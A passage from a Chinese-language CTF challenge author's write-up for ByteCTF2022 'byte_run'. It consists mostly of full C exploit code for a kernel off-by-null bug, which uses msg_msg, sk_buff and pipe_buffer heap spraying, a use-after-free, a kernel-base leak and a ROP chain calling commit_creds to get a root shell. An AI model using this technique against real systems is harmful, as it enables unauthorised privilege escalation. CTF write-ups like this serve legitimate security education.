errExit("failed to create socket pair for OOB write!");
}

/* to run the exp on the specific core only */
CPU_ZERO(&cpu_set);
CPU_SET(0, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

/* socket pairs to spray sk_buff */
for (int i = 0; i < SOCKET_NUM; i++) {
if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0) {
errExit("failed to create socket pair!");
}
}

/**
* Step.I
* build msg_queue, spray primary and secondary msg_msg,
* and use OOB write to construct the overlapping
*/
puts("");
puts("\033[34m\033[1m[*] Step.I spray msg_msg for overlapping obj\033[0m");

puts("[*] Build message queue...");
/* build 4096 message queue */
for (int i = 0; i < MSG_QUEUE_NUM; i++) {
if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0) {
errExit("failed to create msg_queue!");
}
}

puts("[*] Spray primary and secondary msg_msg...");

memset(&primary_msg, 0, sizeof(primary_msg));
memset(&secondary_msg, 0, sizeof(secondary_msg));

/* spray primary and secondary message */
for (int i = 0; i < MSG_QUEUE_NUM; i++) {
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;

ret = writeMsg(msqid[i],
&primary_msg,
sizeof(primary_msg),
PRIMARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to send primary msg!");
}

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;

ret = writeMsg(msqid[i],
&secondary_msg,
sizeof(secondary_msg),
SECONDARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to send secondary msg!");
}
}

/* create hole in primary msg_msg */
puts("[*] Create holes in primary msg_msg...");
for (int i = 0; i < MSG_QUEUE_NUM; i += 1024) {
ret = readMsg(msqid[i],
&primary_msg,
sizeof(primary_msg),
PRIMARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to receive primary msg!");
}
}

/* triger off-by-null on primary msg_msg */
puts("[*] Trigger OOB write to construct the overlapping...");
trigerOutOfBoundWrite(dev_fd, oob_socket);

/* find the queues that have the same secondary msg_msg */
puts("[*] Checking whether succeeded to make overlapping...");
victim_qid = real_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++) {
/* the hole */
if ((i % 256) == 0) {
continue;
}

if (peekMsg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0) {
printf("[x] error qid: %d\n", i);
errExit("failed to receive secondary msg!");
}

if (*(int*) &secondary_msg.mtext[0] != MSG_TAG) {
errExit("failed to make corruption!");
}

if (*(int*) &secondary_msg.mtext[4] != i) {
victim_qid = i;
real_qid = *(int*) &secondary_msg.mtext[4];
break;
}
}

if (victim_qid < 0) {
errExit("failed to make overlapping!");
}

printf("\033[32m\033[1m[+] victim qid:\033[0m %d ", victim_qid);
printf("\033[32m\033[1m real qid: \033[0m %d\n", real_qid);

/**
* Step.II
* construct UAF
*/
puts("\n\033[34m\033[1m[*] Step.II construct UAF\033[0m");

/* free the victim secondary msg_msg, then we get a UAF */
ret = readMsg(msqid[real_qid],
&secondary_msg,
sizeof(secondary_msg),
SECONDARY_MSG_TYPE);
if (ret < 0) {
errExit("failed to receive secondary msg!");
}

puts("\033[32m\033[1m[+] UAF construction complete!\033[0m");

/**
* Step.III
* spray sk_buff to leak msg_msg addr
* construct fake msg_msg to leak addr of UAF obj
*/
puts("");
puts("\033[34m\033[1m[*] Step.III spray sk_buff to leak kheap addr\033[0m");

/* spray sk_buff to construct fake msg_msg */
puts("[*] spray sk_buff...");
buildMsg((struct msg_msg *)fake_second_msg,
*(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3",
VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg),
0, 0);
ret = spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg));
if (ret < 0) {
errExit("failed to spray sk_buff!");
}

/* use fake msg_msg to read OOB */
puts("[*] OOB read from victim msg_msg");
if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
errExit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG) {
errExit("failed to rehit the UAF object!");
}

nearby_msg = (struct msg_msg*)
&oob_msg.mtext[(SECONDARY_MSG_SIZE) - sizeof(struct msg_msg)];

printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: ");
printf("\033[0m%lx\n", nearby_msg->m_list.prev);

/**
* release and re-spray sk_buff to construct fake msg_msg
* so that we can make an arbitrary read on a primary msg_msg
*/
if (freeSkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to release sk_buff!");
}

buildMsg((struct msg_msg *)fake_second_msg,
*(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3",
VICTIM_MSG_TYPE, sizeof(oob_msg.mtext),
nearby_msg->m_list.prev - 8, 0);
if (spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to spray sk_buff!");
}

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0) {
errExit("failed to read victim msg!");
}

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG) {
errExit("failed to rehit the UAF object!");
}

/* cal the addr of UAF obj by the header we just read out */
nearby_msg_prim = (struct msg_msg*)
&oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%lx\n",
nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%lx\n",
victim_addr);

/**
* Step.IV
* fix the header of UAF obj and release it
* spray pipe_buffer and leak the kernel base
*/
puts("");
puts("\033[34m\033[1m[*] Step.IV spray pipe_buffer to leak kbase\033[0m");

/* re-construct the msg_msg to fix it */
puts("[*] fixing the UAF obj as a msg_msg...");
if (freeSkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to release sk_buff!");
}

/**
* XXX: we need to pass the check in lib/list_debug.c
* what we used to not to pass there is
* "prev->next == entry" && "next->prev == entry"
* so a valid memory with [addr of entry] should be set there
*/
memset(fake_second_msg, 0, sizeof(fake_second_msg));
for (int i = 0; i < 0x50; i++) {
((size_t*)(fake_second_msg))[i] = victim_addr;
}
buildMsg((struct msg_msg *)fake_second_msg,
victim_addr + 0x100, victim_addr + 0x100,
VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg),
0, 0);
if (spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to spray sk_buff!");
}

/* release UAF obj as secondary msg */
puts("[*] release UAF obj in message queue...");
ret = readMsg(msqid[victim_qid],
&secondary_msg,
sizeof(secondary_msg),
VICTIM_MSG_TYPE);
if (ret < 0) {
errExit("failed to receive secondary msg!");
}

/* spray pipe_buffer */
puts("[*] spray pipe_buffer...");
for (int i = 0; i < PIPE_NUM; i++) {
if (pipe(pipe_fd[i]) < 0) {
errExit("failed to create pipe!");
}

/* write something to activate the pipe */
if (write(pipe_fd[i][1], "arttnba3", 8) < 0) {
errExit("failed to write the pipe!");
}
}

/* release the sk_buff to read pipe_buffer, leak kernel base */
puts("[*] release sk_buff to read pipe_buffer...");
pipe_buf_ptr = (struct pipe_buffer *) &fake_second_msg;
for (int i = 0; i < SOCKET_NUM; i++) {
for (int j = 0; j < SK_BUFF_NUM; j++) {
ret = read(sk_sockets[i][1],
&fake_second_msg,
sizeof(fake_second_msg));
if (ret < 0) {
errExit("failed to release sk_buff!");
}

if (pipe_buf_ptr->ops > 0xffffffff81000000) {
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops:\033[0m%lx\n",
pipe_buf_ptr->ops);
kernel_offset = pipe_buf_ptr->ops - ANON_PIPE_BUF_OPS;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m%lx ", kernel_base);
printf("\033[32m\033[1moffset: \033[0m%lx\n", kernel_offset);

/**
* Step.V
* hijack the ops of pipe_buffer
* free all pipe to trigger fake ptr
* so that we hijack the RIP
* construct a ROP on pipe_buffer
*/
puts("");
puts("\033[34m\033[1m[*] Step.V hijack the ops of pipe to root\033[0m");

puts("[*] pre-construct data in userspace...");
pipe_buf_ptr = (struct pipe_buffer *) fake_second_msg;
pipe_buf_ptr->ops = victim_addr;

ops_ptr = (struct pipe_buf_operations *) fake_second_msg;
/* push rsi ; pop rsp ; pop rbx ; pop r12 ; ret */
ops_ptr->release = 0xffffffff8133151b + kernel_offset;
/* ret */
ops_ptr->get = 0xffffffff81331534 + kernel_offset;

rop_idx = 0;
rop_chain = (uint64_t*) &fake_second_msg[0x20];
rop_chain[rop_idx++] = kernel_offset + POP_RDI_RET;
rop_chain[rop_idx++] = kernel_offset + INIT_CRED;
rop_chain[rop_idx++] = kernel_offset + COMMIT_CREDS;
rop_chain[rop_idx++] = \
kernel_offset + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
rop_chain[rop_idx++] = *(uint64_t*) "arttnba3";
rop_chain[rop_idx++] = (size_t) getRootShell;
rop_chain[rop_idx++] = user_cs;
rop_chain[rop_idx++] = user_rflags;
rop_chain[rop_idx++] = user_sp;
rop_chain[rop_idx++] = user_ss;

puts("[*] spray sk_buff to hijack pipe_buffer...");
if (spraySkBuff(sk_sockets, fake_second_msg, sizeof(fake_second_msg)) < 0) {
errExit("failed to spray sk_buff!");
}

puts("[*] trigger fake ops->release to hijack RIP...");
//sleep(5);
for (int i = 0; i < PIPE_NUM; i++) {
close(pipe_fd[i][0]);
close(pipe_fd[i][1]);
}

return 0;
}

由于堆喷的不稳定性,在第一阶段还是有可能会挂掉的,因此这道题目其实还是需要爆破的一道题目,几率 1/16:

img.jpg

0x03.解题情况

这道题笔者最初出题的时候是按照签到题的难度出的,因为这道题的两个阶段:阶段一的 kernel UAF 其实是可以直接使用通解完成解题的,而阶段二的 QEMU 逃逸则是一个非常直白的越界读写漏洞,利用起来也不算困难。

但最后并没有队伍解开这道题,可能是因为大家觉得笔者的题目太简单了都不屑于做吧(笑)


【CTF.0x07】ByteCTF2022 byte_run 出题手记
https://arttnba3.github.io/2022/09/30/CTF-0X07-BYTECTF2022_BYTERUN/
作者
arttnba3
发布于
2022年9月30日
许可协议